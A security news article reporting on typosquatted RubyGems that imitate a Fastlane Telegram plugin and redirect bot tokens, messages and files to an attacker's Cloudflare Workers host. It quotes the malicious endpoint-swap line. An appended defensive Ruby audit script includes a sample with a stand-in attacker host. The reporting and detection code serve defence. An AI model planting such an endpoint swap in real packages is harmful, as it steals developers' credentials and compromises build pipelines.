
Hackers Weaponize Ruby Gems To Exfiltrate Telegram Tokens and Messages

A sophisticated supply chain attack has emerged targeting the RubyGems ecosystem, exploiting geopolitical tensions surrounding Vietnam’s recent Telegram ban to steal sensitive developer credentials and communications.

The malicious campaign involves two typosquatted Ruby gems designed to impersonate legitimate Fastlane plugins, silently redirecting Telegram API traffic through attacker-controlled infrastructure to harvest bot tokens, message content, and attached files.

The timing of this attack is particularly concerning, as the malicious packages appeared just days after Vietnam ordered a nationwide blocking of Telegram on May 21, 2025.

The threat actor behind the campaign strategically marketed these gems as “proxy” plugins to exploit the increased demand for Telegram workarounds among developers affected by the ban.

This opportunistic approach demonstrates how cybercriminals are rapidly adapting to exploit geopolitical events for targeted supply chain attacks.

Socket.dev analysts identified the campaign through their threat research team, uncovering two malicious gems published under the aliases Bùi nam, buidanhnam, and si_mobile.

The packages Fastlane-plugin-telegram-proxy and fastlane-plugin-proxy_teleram were designed to impersonate the legitimate fastlane-plugin-telegram project, which has over 600,000 downloads and is widely used for sending deployment notifications to Telegram channels from CI/CD pipelines.

Malicious plugin (Source – Socket.dev)

The attack’s sophistication lies in its minimal code modification approach. The threat actor copied the original project’s README, preserved the public API, and retained expected plugin behavior while making only one critical change.

The impact extends far beyond simple credential theft, as Fastlane operates within CI/CD pipelines that handle sensitive assets including signing keys, release binaries, and environment secrets, potentially compromising entire software build and release workflows.

Technical Analysis of the Infection Mechanism

The malicious gems represent a masterclass in deceptive simplicity, achieving maximum impact through minimal code alteration.

The threat actor’s approach centered on replacing a single line of code that redirects network traffic from Telegram’s legitimate API endpoint to an attacker-controlled command and control server.

Telegram Bot API Proxy (Source – Socket.dev)

In the legitimate fastlane-plugin-telegram, messages are sent directly to Telegram’s official API using the standard endpoint:

uri = URI.parse("https://api.telegram.org/bot#{token}/sendMessage")

However, in the malicious versions, this critical line was replaced with a hardcoded C2 endpoint:

# Threat actor's proxy C2 endpoint; not Telegram
uri = URI.parse("https://rough-breeze-0c37[.]buidanhnam95[.]workers[.]dev/bot#{token}/sendMessage")

This subtle substitution enables the threat actor to automatically capture bot tokens, chat identifiers, message content, and any uploaded files while maintaining the plugin’s expected functionality.

The malicious endpoint, hosted on Cloudflare Workers, presents itself as a benign Telegram Bot API proxy, claiming not to store or modify bot tokens.

However, the implementation remains entirely opaque, with no published source code or transparency measures that would characterize a legitimate proxy service.

The persistence of this attack vector is particularly troubling, as stolen tokens remain valid until manually revoked, creating a window for ongoing unauthorized access to victim Telegram bots and their associated data streams.
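Because the only change between the legitimate plugin and the typosquats is the host in that one URI.parse line, a defender can audit a vendored or installed gem for exactly that substitution. The following Ruby script is an added example, not code from the article or from Socket.dev; it scans plugin source for Telegram Bot API URLs and flags any whose host is not api.telegram.org. The two sample sources and the host attacker-proxy.example are constructed placeholders.

```ruby
# Added example: audit Ruby source for Telegram Bot API calls that do not go to
# api.telegram.org (the one-line change the malicious gems made).
require 'uri'

TELEGRAM_HOST = 'api.telegram.org'.freeze

# Matches URI.parse("https://<host>/bot#{token}/<method>") with either quote style.
BOT_URL_RE = %r!URI\.parse\(\s*["'](https?://[^"']*?/bot#\{[^}]*\}/\w+)["']\s*\)!

# Returns [line_number, host, url] for every Bot API URL whose host is not
# the official Telegram API host. An empty array means nothing suspicious.
def audit_telegram_endpoints(source)
  findings = []
  source.each_line.with_index(1) do |line, lineno|
    next unless (m = BOT_URL_RE.match(line))
    url = m[1]
    # Swap the Ruby interpolation for a dummy token so URI can parse the string.
    host = URI.parse(url.gsub(/#\{[^}]*\}/, 'TOKEN')).host
    findings << [lineno, host, url] unless host == TELEGRAM_HOST
  end
  findings
end

# Constructed sample: what the legitimate plugin's send path looks like.
LEGIT_SOURCE = <<~'SRC'
  def send_message(token, chat_id, text)
    uri = URI.parse("https://api.telegram.org/bot#{token}/sendMessage")
    Net::HTTP.post_form(uri, chat_id: chat_id, text: text)
  end
SRC

# Constructed sample: same code with the endpoint swapped for a proxy host
# (placeholder host standing in for an attacker-controlled workers.dev C2).
MALICIOUS_SOURCE = <<~'SRC'
  def send_message(token, chat_id, text)
    uri = URI.parse("https://attacker-proxy.example/bot#{token}/sendMessage")
    Net::HTTP.post_form(uri, chat_id: chat_id, text: text)
  end
SRC

if __FILE__ == $PROGRAM_NAME
  { 'legit' => LEGIT_SOURCE, 'typosquat' => MALICIOUS_SOURCE }.each do |name, src|
    findings = audit_telegram_endpoints(src)
    puts "#{name}: #{findings.empty? ? 'OK' : 'SUSPICIOUS'}"
    findings.each { |ln, host, url| puts "  line #{ln}: host #{host} in #{url}" }
  end
end
```

Run it against the unpacked gem's lib/ directory (for example by reading each file and passing its contents to audit_telegram_endpoints) to catch the substitution before the plugin ever runs in a pipeline.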


Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.
